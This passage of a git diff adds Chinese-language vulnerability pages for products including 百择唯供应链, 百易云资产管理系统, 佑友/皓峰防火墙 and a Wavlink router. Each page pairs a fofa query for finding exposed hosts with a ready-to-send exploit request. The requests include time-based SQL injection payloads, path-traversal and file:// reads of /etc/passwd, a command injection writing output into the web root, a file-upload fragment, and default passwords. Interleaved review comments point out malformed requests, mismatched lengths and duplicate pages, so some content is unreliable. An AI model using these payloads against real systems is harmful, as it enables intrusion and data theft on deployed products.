name="id_type" + +1 +-----------------------------42328904123665875270630079328 +Content-Disposition: form-data; name="1_ck" + +1_radhttp +-----------------------------42328904123665875270630079328 +Content-Disposition: form-data; name="mode" + +import +-----------------------------42328904123665875270630079328 +``` + 
+![1699975835584-e542cf6b-0f16-4851-a019-0693c1a35825.png](./img/KzgUSQ8c-_hpC3fM/1699975835584-e542cf6b-0f16-4851-a019-0693c1a35825-685758.png) + +3. 上传文件位置 + +```plain +/upload/2.php +``` + +![1699975873888-77ee6853-8e05-490e-bc05-d2f80b95be6e.png](./img/KzgUSQ8c-_hpC3fM/1699975873888-77ee6853-8e05-490e-bc05-d2f80b95be6e-062968.png) + + + +> 更新: 2024-02-29 23:57:13 +> 原文: \ No newline at end of file diff --git a/百择唯·供应链RankingGoodsList2存在SQL注入漏洞.md b/百择唯·供应链RankingGoodsList2存在SQL注入漏洞.md new file mode 100644 index 0000000..b0cf375 --- /dev/null +++ b/百择唯·供应链RankingGoodsList2存在SQL注入漏洞.md @@ -0,0 +1,33 @@ +# 百择唯·供应链 RankingGoodsList2存在SQL注入漏洞 + +# 一、漏洞简介 +懂微科技是一家专注于办公服务行业电商解决方案的提供商,致力于为办公服务行业赋能、提升效率和核心竞争力。百择唯·供应链作为懂微科技的重要产品之一,旨在通过数字化手段优化办公服务行业的供应链管理,提升采购效率,降低采购成本,增强企业的盈利能力。适用于各种需要优化供应链管理、提升采购效率的企业。同时,通过与合作伙伴的共享共建,构建完善的供应链生态体系,提升整体运营效率和市场竞争力。百择唯·供应链 RankingGoodsList2存在SQL注入漏洞 + +# 二、影响版本 ++ 百择唯·供应链 + +# 三、资产测绘 ++ fofa`body="/Content/Css/_SiteCss/"` ++ 特征 + +![1732022759477-c1a2bd70-04f5-44bd-bc33-ca5624510b7b.png](./img/jlgM_sWCTSTwqCWx/1732022759477-c1a2bd70-04f5-44bd-bc33-ca5624510b7b-956370.png) + +# 四、漏洞复现 +```java +POST /Goods/RankingGoodsList2 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: keep-alive + +goodsSortType=Recommend&goodsTypeList%5B%5D=1%';WAITFOR DELAY '0:0:5'-- +``` + +![1732022907643-8a0884e7-7a63-4742-ac74-576dd5c7e13c.png](./img/jlgM_sWCTSTwqCWx/1732022907643-8a0884e7-7a63-4742-ac74-576dd5c7e13c-370161.png) + + + +> 更新: 2024-11-27 10:00:05 +> 原文: \ No newline at end of file diff --git a/百择唯供应链存在RankingGoodsList2存在SQL注入漏洞.md b/百择唯供应链存在RankingGoodsList2存在SQL注入漏洞.md new file mode 100644 index 0000000..ce1cb50 --- /dev/null +++ b/百择唯供应链存在RankingGoodsList2存在SQL注入漏洞.md 
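Review bot: in the `百卓Smart后台任意文件上传漏洞` hunk the request is malformed in three places: the `Accept:` header has been joined onto the end of the `User-Agent:` line (`... like GeckoAccept: text/html,...`), the `2.php` part has an empty body, and the final boundary line `-----------------------------42328904123665875270630079328` lacks the closing `--`, so the multipart body is never terminated and `Content-Length: 611` cannot be right. Split the headers, put a harmless marker in the part, close the body with the `--` suffix and recompute the length. Step 1 should also note that the default `admin/admin` credentials are a finding in their own right.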
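Review bot: in the `百择唯·供应链RankingGoodsList2` hunk the body `goodsTypeList%5B%5D=1%';WAITFOR DELAY '0:0:5'--` mixes percent-encoded brackets with a raw `%`, quote and spaces; in `application/x-www-form-urlencoded` a literal `%` must be sent as `%25`, otherwise `%'` is an invalid escape and parsers differ in what they hand to the application, so encode the whole value and state that the positive indicator is the roughly five-second response delay. No `Content-Length` is given for a POST with a body.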
@@ -0,0 +1,28 @@ +# 百择唯供应链存在RankingGoodsList2存在SQL注入漏洞 + +百择唯供应链存在RankingGoodsList2 SQL注入漏洞,未经身份验证的攻击者通过漏洞,执行任意代码从而获取到服务器权限。 + +## fofa + +```javascript +body="/Content/Css/_SiteCss/" +``` + +## poc + +```javascript +POST /Goods/RankingGoodsList2 HTTP/1.1 +Host: +Content-Length: 99 +Accept: */* +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: keep-alive + +goodsTypeList%5B%5D=090501&goodsSortType=Recommend&ColumnName=%E5%90%8C%E7%B1%BB%E6%8E%A8%E8%8D%90 +``` + +![ddd1da3ecfceda9da7b026bffc218972](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411211145704.png) diff --git a/百择唯供应链存在ReadAfterSaleList存在SQL注入漏洞.md b/百择唯供应链存在ReadAfterSaleList存在SQL注入漏洞.md new file mode 100644 index 0000000..d1e4b3b --- /dev/null +++ b/百择唯供应链存在ReadAfterSaleList存在SQL注入漏洞.md @@ -0,0 +1,28 @@ +# 百择唯供应链存在ReadAfterSaleList存在SQL注入漏洞 + +百择唯供应链存在ReadAfterSaleList SQL注入漏洞,未经身份验证的攻击者通过漏洞,执行任意代码从而获取到服务器权限。 + +## fofa + +```javascript +body="/Content/Css/_SiteCss/" +``` + +## poc + +```javascript +POST /AfterSale/ReadAfterSaleList HTTP/1.1 +Host: +Content-Length: 106 +Accept: */* +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Cookie: 你的Cookie +Connection: keep-alive + +time=%E8%BF%91%E4%B8%80%E5%91%A8%E8%AE%A2%E5%8D%95&state=%E5%B7%B2%E7%AD%BE%E6%94%B6&key='&index=1&rows=10 +``` + diff --git a/百择唯供应链存在SearchOrderByParams存在SQL注入漏洞.md b/百择唯供应链存在SearchOrderByParams存在SQL注入漏洞.md new file mode 100644 index 0000000..2739e7c --- /dev/null +++ b/百择唯供应链存在SearchOrderByParams存在SQL注入漏洞.md 
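Review bot: the `百择唯供应链存在RankingGoodsList2存在SQL注入漏洞` hunk duplicates the `百择唯·供应链RankingGoodsList2` file added earlier in this commit (same endpoint `/Goods/RankingGoodsList2`, same fofa fingerprint), and its request body `goodsTypeList%5B%5D=090501&goodsSortType=Recommend&ColumnName=...` contains no injection at all, so a reader cannot tell which parameter is affected; drop this file in favour of the earlier one, or name the injectable parameter and the observable response difference. The title also repeats `存在` twice.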
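Review bot: in the `百择唯供应链存在ReadAfterSaleList` hunk the summary says `未经身份验证的攻击者` but the request requires `Cookie: 你的Cookie`, so the two contradict each other; say whether a session is needed, since that decides the severity and who can reach the endpoint. The only payload is a bare `'` in `key='`, with no description of the resulting error or difference, so the check cannot be scripted.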
@@ -0,0 +1,28 @@ +# 百择唯供应链存在SearchOrderByParams存在SQL注入漏洞 + +百择唯供应链存在SearchOrderByParams SQL注入漏洞,未经身份验证的攻击者通过漏洞,执行任意代码从而获取到服务器权限。 + +## fofa + +```javascript +body="/Content/Css/_SiteCss/" +``` + +## poc + +```javascript +POST /M/SearchOrderByParams HTTP/1.1 +Host: +Content-Length: 17 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0 +Accept: */* +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 +Cookie: 你的Cookie +Connection: keep-alive + +Key=&SearchType=1 +``` + diff --git a/百易云资产管理系统admin.ticket.close.php存在SQL注入漏洞.md b/百易云资产管理系统admin.ticket.close.php存在SQL注入漏洞.md new file mode 100644 index 0000000..1bbcfd1 --- /dev/null +++ b/百易云资产管理系统admin.ticket.close.php存在SQL注入漏洞.md @@ -0,0 +1,22 @@ +# 百易云资产管理系统admin.ticket.close.php存在SQL注入漏洞 + +百易云资产管理系统在admin.ticket.close.php接口下存在sql注入漏洞 + +## fofa + +```javascript +body="不要着急,点此" +``` + +## poc + +```javascript +GET /wuser/admin.ticket.close.php?ticket_id=1%20AND%20(SELECT%206941%20FROM%20(SELECT(SLEEP(2)))OKTO) HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0) +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close + + +``` diff --git a/百易云资产管理运营系统house.save.php存在SQL注入漏洞.md b/百易云资产管理运营系统house.save.php存在SQL注入漏洞.md new file mode 100644 index 0000000..732745f --- /dev/null +++ b/百易云资产管理运营系统house.save.php存在SQL注入漏洞.md 
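Review bot: in the `百择唯供应链存在SearchOrderByParams` hunk the summary again claims `未经身份验证` while the request sends `Cookie: 你的Cookie`, and the body `Key=&SearchType=1` holds no injection payload and no indicator of what a vulnerable response looks like, so the file documents an endpoint but not a vulnerability; name the injectable parameter and the observable difference, or hold the file until they are known.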
@@ -0,0 +1,23 @@ +# 百易云资产管理运营系统house.save.php存在SQL注入漏洞 + +百易云资产管理运营系统 house.save.php 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```yaml +body="不要着急,点此" +``` + +## poc + +```javascript +GET /adminx/house.save.php?project_id=1%20AND%20(SELECT%206941%20FROM%20(SELECT(SLEEP(5)))OKTO) HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Encoding: gzip, deflate +Connection: keep-alive +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409111003864.png) \ No newline at end of file diff --git a/百易云资产管理运营系统ticket.edit.php存在SQL注入漏洞.md b/百易云资产管理运营系统ticket.edit.php存在SQL注入漏洞.md new file mode 100644 index 0000000..8a9759d --- /dev/null +++ b/百易云资产管理运营系统ticket.edit.php存在SQL注入漏洞.md @@ -0,0 +1,23 @@ +# 百易云资产管理运营系统ticket.edit.php存在SQL注入漏洞 + +百易云资产管理运营系统ticket.edit.php存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```yaml +body="不要着急,点此" +``` + +## poc + +```javascript +GET /adminx/ticket.edit.php?project_id=1%20AND%20(SELECT%206941%20FROM%20(SELECT(SLEEP(5)))OKTO) HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Encoding: gzip, deflate +Connection: keep-alive +``` + +![image-20240923093436135](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409230934196.png) \ No newline at end of file diff --git a/百易云资产管理运营系统ufile.api.php存在SQL注入漏洞.md b/百易云资产管理运营系统ufile.api.php存在SQL注入漏洞.md new file mode 100644 index 0000000..fcf75f0 --- /dev/null +++ b/百易云资产管理运营系统ufile.api.php存在SQL注入漏洞.md 
@@ -0,0 +1,25 @@ +# 百易云资产管理运营系统ufile.api.php存在SQL注入漏洞 + +百易云资产管理运营系统ufile.api.php存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```yaml +body="不要着急,点此" +``` + +## poc + +```javascript +GET /api/file/ufile.api.php?act=filedel&fid=1%20AND%20(SELECT%207357%20FROM%20(SELECT(SLEEP(2)))UPCw) HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +Priority: u=0, i +``` + +![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410231039295.png) \ No newline at end of file diff --git a/皓峰防火墙login.php存在SQL注入漏洞.md b/皓峰防火墙login.php存在SQL注入漏洞.md new file mode 100644 index 0000000..e3614e0 --- /dev/null +++ b/皓峰防火墙login.php存在SQL注入漏洞.md 
@@ -0,0 +1,54 @@ +# 皓峰防火墙login.php存在SQL注入漏洞 + +# 一、漏洞简介 +深圳市皓峰通讯技术有限公司成立于2004年,位于深圳市高新技术产业园,是经过国家认定的“双软”企业和“国家高新技术企业”。佑友防火墙login存在SQL注入漏洞 + +# 二、影响版本 ++ 佑友防火墙 + +# 三、资产测绘 +```plain +fofa:title="佑友防火墙" +``` + +![1716109175546-e972b21a-f4d3-4a0f-9677-9e95504a96b0.png](./img/8iZtJsEL5UgBow79/1716109175546-e972b21a-f4d3-4a0f-9677-9e95504a96b0-834190.png) + +# 四、漏洞复现 +```plain +POST /login.php HTTP/1.1 +Host: +Cookie: PHPSESSID=qc13eucchtnbr161lnca4ibde1 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Content-Length: 67 + +action=login&username=dadsa' AND (SELECT 6357 FROM (SELECT(SLEEP(5)))DIFt) AND 'lKDb'='lKDb&password=dada&submit=%E7%99%BB%E5%BD%95 +``` + +![1716109122397-82220e26-ce75-436b-ae2a-531cd0cae6de.png](./img/8iZtJsEL5UgBow79/1716109122397-82220e26-ce75-436b-ae2a-531cd0cae6de-861886.png) + +```plain +POST /login.php HTTP/1.1 +Host: +Cookie: PHPSESSID=qc13eucchtnbr161lnca4ibde1 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Content-Length: 67 + +action=login&username=dadsa&password=dada&submit=%E7%99%BB%E5%BD%95 +``` + +![1716109058542-6ed430c0-630c-49a2-9985-77465eb6ef21.png](./img/8iZtJsEL5UgBow79/1716109058542-6ed430c0-630c-49a2-9985-77465eb6ef21-481519.png) + + + +> 更新: 2024-05-20 22:23:58 +> 原文: \ No newline at end of file 
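Review bot: in the `皓峰防火墙login.php` hunk both requests declare `Content-Length: 67`, which is correct only for the second body (`action=login&username=dadsa&password=dada&submit=%E7%99%BB%E5%BD%95`); the first body with the `SLEEP(5)` payload is much longer, so the header was copied without being recomputed and a server that honours the length truncates the injected request. The title and the fofa query use `皓峰防火墙` and `佑友防火墙` interchangeably (`# 皓峰防火墙login.php...` vs `+ 佑友防火墙` and `title="佑友防火墙"`); state the relation between the two names once so the product can be matched in an asset inventory.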
diff --git a/皓峰防火墙setdomain存在信息泄露漏洞.md b/皓峰防火墙setdomain存在信息泄露漏洞.md new file mode 100644 index 0000000..631bf60 --- /dev/null +++ b/皓峰防火墙setdomain存在信息泄露漏洞.md @@ -0,0 +1,28 @@ +# 皓峰防火墙setdomain存在信息泄露漏洞 + +# 一、漏洞简介 +深圳市皓峰通讯技术有限公司成立于2004年,位于深圳市高新技术产业园,是经过国家认定的“双软”企业和“国家高新技术企业”。皓峰防火墙系统存在信息泄露漏洞,攻击者可利用该漏洞获取敏感信息。 + +# 二、影响版本 ++ 佑友防火墙 + +# 三、资产测绘 +```plain +fofa:title="佑友防火墙" +``` + +![1716109179632-2019ee30-a9a4-4e0a-ae2d-bce9bd9d6d2f.png](./img/pZakr3fj83f4UEn3/1716109179632-2019ee30-a9a4-4e0a-ae2d-bce9bd9d6d2f-022177.png) + +# 四、漏洞复现 +```plain +/setdomain.php +``` + +![1716107923587-1798acc2-e923-4285-a7b9-9df39a3c19a8.png](./img/pZakr3fj83f4UEn3/1716107923587-1798acc2-e923-4285-a7b9-9df39a3c19a8-851228.png) + +![1716107933589-7bcf6a84-4cfc-480b-bf05-36aa2c6fa0d7.png](./img/pZakr3fj83f4UEn3/1716107933589-7bcf6a84-4cfc-480b-bf05-36aa2c6fa0d7-342483.png) + + + +> 更新: 2024-05-20 22:24:02 +> 原文: \ No newline at end of file diff --git a/皓峰防火墙存在弱口令漏洞.md b/皓峰防火墙存在弱口令漏洞.md new file mode 100644 index 0000000..e0bcd93 --- /dev/null +++ b/皓峰防火墙存在弱口令漏洞.md @@ -0,0 +1,29 @@ +# 皓峰防火墙存在弱口令漏洞 + +# 一、漏洞简介 +深圳市皓峰通讯技术有限公司成立于2004年,位于深圳市高新技术产业园,是经过国家认定的“双软”企业和“国家高新技术企业”。佑友防火墙存在弱口令漏洞 + +# 二、影响版本 ++ 佑友防火墙 + +# 三、资产测绘 +```plain +fofa:title="佑友防火墙" +``` + +![1716109171548-60a18d8a-252e-4667-bdfd-469a65d1ad46.png](./img/IXIaCzxNCoUKBCcL/1716109171548-60a18d8a-252e-4667-bdfd-469a65d1ad46-789971.png) + +# 四、漏洞复现 +```plain +admin/0000 +superadmin/888888 +``` + +![1716108465436-0536c9d9-b1da-4fa9-912a-f3b8c491c6b2.png](./img/IXIaCzxNCoUKBCcL/1716108465436-0536c9d9-b1da-4fa9-912a-f3b8c491c6b2-655449.png) + +![1716108493662-d793852e-9184-4690-ac4e-aba6f3884f98.png](./img/IXIaCzxNCoUKBCcL/1716108493662-d793852e-9184-4690-ac4e-aba6f3884f98-909975.png) + + + +> 更新: 2024-05-20 22:24:10 +> 原文: \ No newline at end of file diff --git a/盲盒抽奖小程序系统存在任意文件读取漏洞.md b/盲盒抽奖小程序系统存在任意文件读取漏洞.md new file mode 100644 index 0000000..98929f1 --- /dev/null +++ b/盲盒抽奖小程序系统存在任意文件读取漏洞.md 
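Review bot: the setdomain page documents the finding as the bare path `/setdomain.php` and leaves the evidence to two screenshots; list the sensitive fields the response exposes (or a string to match on) so the finding can be verified from the text alone. Both files in this hunk carry the same 皓峰/佑友 naming split as the login.php page, and the 弱口令 list `admin/0000` / `superadmin/888888` would be more useful with a note on whether these are factory defaults or observed values.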
@@ -0,0 +1,45 @@ +# 盲盒抽奖小程序系统存在任意文件读取漏洞 + +# 一、漏洞简介 +盲盒抽奖小程序系统存在任意文件读取漏洞 + +# 二、影响版本 ++ 盲盒抽奖小程序系统 + +# 三、资产测绘 ++ fofa + +```plain +"vendor/owl.carousel2/assets/owl.carousel.css" && "img/arrow-left.png" +``` + ++ 特征 + +![1731491896473-24d5cb3b-d315-42f2-9ec1-1f134e61a755.png](./img/dpPBebsZuuMRaArk/1731491896473-24d5cb3b-d315-42f2-9ec1-1f134e61a755-241134.png) + +# 四、漏洞复现 +先注册一个账号 + +```plain +/index/user/register.html +``` + +![1731491909841-961c0fff-99f9-4dbf-98ac-12b86fdd1ca5.png](./img/dpPBebsZuuMRaArk/1731491909841-961c0fff-99f9-4dbf-98ac-12b86fdd1ca5-628641.png) + +```plain +GET /api/user/http_request?url=file:///etc/passwd HTTP/2.0 +Host: +upgrade-insecure-requests: 1 +user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 +cookie: PHPSESSID=6e6b24gm79uba18etg6j1cj3a5 +cookie: think_var=zh-cn +cookie: uid=22 +cookie: token=44ee3c7f-0b30-4e2d-9357-4442231c49b0 +``` + +![1731491856618-2fb8c5e0-7d17-4677-bc31-70b72099de96.png](./img/dpPBebsZuuMRaArk/1731491856618-2fb8c5e0-7d17-4677-bc31-70b72099de96-714752.png) + + + +> 更新: 2024-11-27 10:00:07 +> 原文: \ No newline at end of file diff --git a/真内控国产化平台preview存在任意文件读取漏洞.md b/真内控国产化平台preview存在任意文件读取漏洞.md new file mode 100644 index 0000000..2b0c228 --- /dev/null +++ b/真内控国产化平台preview存在任意文件读取漏洞.md 
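Review bot: the request line `GET /api/user/http_request?url=file:///etc/passwd HTTP/2.0` together with four separate `cookie:` lines is Burp's HTTP/2 rendering, not a replayable HTTP/1.1 request; write it as `HTTP/1.1` with a single `Cookie: PHPSESSID=...; think_var=zh-cn; uid=22; token=...` header. Since the page first registers an account, the summary should say the bug is reachable by any registered user (post-auth), and because the sink is a caller-chosen `url=` that accepts `file://`, it is an SSRF primitive rather than only a file read; naming it that way tells readers to also try internal `http://` targets.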
@@ -0,0 +1,28 @@ +# 真内控国产化平台preview存在任意文件读取漏洞 + +# 一、漏洞简介 +真内控国产化平台是基于国产可控技术开发的内部控制管理咨询及信息化服务平台。该平台涵盖了预算绩效、支出管理、采购管理、合同管理、资产管理、基建项目管理等多个模块,为公共部门(包括政府部门、科研机构、学校、医院等)提供全方位的经济活动内部控制解决方案。真内控国产化平台 preview接口存在一个任意文件读取漏洞,攻击者可以通过构造精心设计的请求,成功利用漏洞读取服务器上的任意文件,包括敏感系统文件和应用程序配置文件等。通过利用此漏洞,攻击者可能获得系统内的敏感信息,导致潜在的信息泄露风险。 + +# 二、影响版本 +真内控国产化平台 + +# 三、资产测绘 +```plain +body="js/npm.echarts.js" +``` + +![1718991802147-8b55da97-545e-456a-b18e-fa349435c2ae.png](./img/PUn3lRwoNJ9lQ-zV/1718991802147-8b55da97-545e-456a-b18e-fa349435c2ae-033492.png) + +# 四、漏洞复现 +```java +GET /print/billPdf/preview?urlPath=../../../../../../../../../../../../../../etc/passwd HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +``` + +![1718991623666-59807fc9-1c16-4ff4-bb86-305f12a4f0b5.png](./img/PUn3lRwoNJ9lQ-zV/1718991623666-59807fc9-1c16-4ff4-bb86-305f12a4f0b5-514760.png) + + + +> 更新: 2024-06-23 23:42:48 +> 原文: \ No newline at end of file diff --git a/睿因-Wavlink-WL_WNJ575A3-远程命令执行.md b/睿因-Wavlink-WL_WNJ575A3-远程命令执行.md new file mode 100644 index 0000000..b46c702 --- /dev/null +++ b/睿因-Wavlink-WL_WNJ575A3-远程命令执行.md 
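Review bot: the fingerprint `body="js/npm.echarts.js"` matches any site that ships an echarts bundle, so the 资产测绘 query will return far more than 真内控 installs; combine it with a product-specific string. Minor: the request fence is tagged `java` for an HTTP request (other pages use `plain`), and the page should describe the successful response for `urlPath=../../../../etc/passwd` rather than relying on the screenshot.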
@@ -0,0 +1,33 @@ +## 睿因 Wavlink WL_WNJ575A3 远程命令执行 +影响版本 + +Wavlink WL_WNJ575A3 v.R75A3_V1410_220513 + +漏洞代码 + +POC +``` +POST /cgi-bin/adm.cgi HTTP/1.1 +Host: 192.168.10.1 +Content-Length: 91 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://192.168.10.1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) +Chrome/100.0.4896.60 Safari/537.36 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*; +q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://192.168.10.1/set_time.shtml?r=29725 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: session=1243623152 +Connection: close + +page=sysAdm&SYSPASS=password&username='`ls>/etc_ro/lighttpd/www/data.html`'&newpass= 12345678 + + +``` +1.Burp 发包执行命令 +2.访问“data.html”查看命令执行结 diff --git a/知识吾爱纯净版小程序系统leibiao存在SQL注入漏洞 2.md b/知识吾爱纯净版小程序系统leibiao存在SQL注入漏洞 2.md new file mode 100644 index 0000000..432d3f6 --- /dev/null +++ b/知识吾爱纯净版小程序系统leibiao存在SQL注入漏洞 2.md 
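Review bot: the `漏洞代码` heading has no content, and the body `page=sysAdm&SYSPASS=password&username='`ls>/etc_ro/lighttpd/www/data.html`'&newpass= 12345678` depends on both `SYSPASS=password` and `Cookie: session=1243623152`, which makes this a post-authentication injection through the admin password-change form; say so in the title or summary. The `User-Agent` and `Accept` headers are wrapped onto continuation lines (`Chrome/100.0.4896.60 Safari/537.36` and `text/html,...` stand alone), which a raw replay will reject, and the space in `newpass= 12345678` looks accidental.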
@@ -0,0 +1,26 @@ +# 知识吾爱纯净版小程序系统leibiao存在SQL注入漏洞 + +知识吾爱纯净版小程序系统leibiao存在SQL注入漏洞,位于 /Application/App/Controller/ZmController.class.php 控制器中的leibiao方法直接POST传入tid参数,然后直接带到sql查询中,导致漏洞产生。 + +fofa + +```javascript +"域名/skdjfdf" +``` + +## poc + +```javascript +POST /app/zm/leibiao HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Cookie: PHPSESSID=q7pp0d3p3f5ileeqhnf8v5lnt1 +Connection: close +Content-Length: 55 + +tid=(CASE WHEN (3711=3711) THEN SLEEP(5) ELSE 3711 END) +``` + +![c469f37e9896e4ad478f4d75eadc4196](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410181628116.jpg) \ No newline at end of file diff --git a/知识吾爱纯净版小程序系统leibiao存在SQL注入漏洞.md b/知识吾爱纯净版小程序系统leibiao存在SQL注入漏洞.md new file mode 100644 index 0000000..9c01492 --- /dev/null +++ b/知识吾爱纯净版小程序系统leibiao存在SQL注入漏洞.md 
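Review bot: this file is a near-verbatim duplicate of 知识吾爱纯净版小程序系统leibiao存在SQL注入漏洞.md (same route `/app/zm/leibiao`, same body `tid=(CASE WHEN (3711=3711) THEN SLEEP(5) ELSE 3711 END)`); keep one page and carry over the source detail about `leibiao` in `ZmController.class.php`, which only this copy has. The fofa query is written as a bare string `"域名/skdjfdf"` here and as `body="域名/skdjfdf"` in the other copy; if 域名 is literally present in the page body say so, otherwise it reads like an unfilled placeholder.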
@@ -0,0 +1,35 @@ +# 知识吾爱纯净版小程序系统leibiao存在SQL注入漏洞 + +# 一、漏洞简介 +知识吾爱纯净版小程序系统是一款基于 微信小程序平台开发的知识付费应用,旨在帮助用户快速建立自己的知识付费平台,实现支付变现和流量主收益。它提供了简洁明了的用户界面和良好的用户体验,同时注重用户隐私保护,确保用户信息的安全存储和传输。知识吾爱纯净版小程序系统leibiao存在SQL注入漏洞 + +# 二、影响版本 ++ 知识吾爱纯净版小程序系统 + +# 三、资产测绘 +```plain +body="域名/skdjfdf" +``` + +![1730458370615-6af13af3-b0ea-4efb-8893-a60e7a5b115d.png](./img/6k5iZDzwJDll-eGM/1730458370615-6af13af3-b0ea-4efb-8893-a60e7a5b115d-319172.png) + +![1730458386388-e28bc009-06d0-4fd2-b287-33c2e81c7310.png](./img/6k5iZDzwJDll-eGM/1730458386388-e28bc009-06d0-4fd2-b287-33c2e81c7310-108578.png) + +# 四、漏洞复现 +```plain +POST /app/zm/leibiao HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Connection: close + +tid=(CASE WHEN (3711=3711) THEN SLEEP(5) ELSE 3711 END) +``` + +![1730458437073-fbd1aa3f-fcf5-4ab3-95a1-928e9f5975cc.png](./img/6k5iZDzwJDll-eGM/1730458437073-fbd1aa3f-fcf5-4ab3-95a1-928e9f5975cc-934639.png) + + + +> 更新: 2024-11-27 10:00:37 +> 原文: \ No newline at end of file diff --git a/短剧影视小程序前台base64_image_content任意文件上传漏洞.md b/短剧影视小程序前台base64_image_content任意文件上传漏洞.md new file mode 100644 index 0000000..f8b28c9 --- /dev/null +++ b/短剧影视小程序前台base64_image_content任意文件上传漏洞.md 
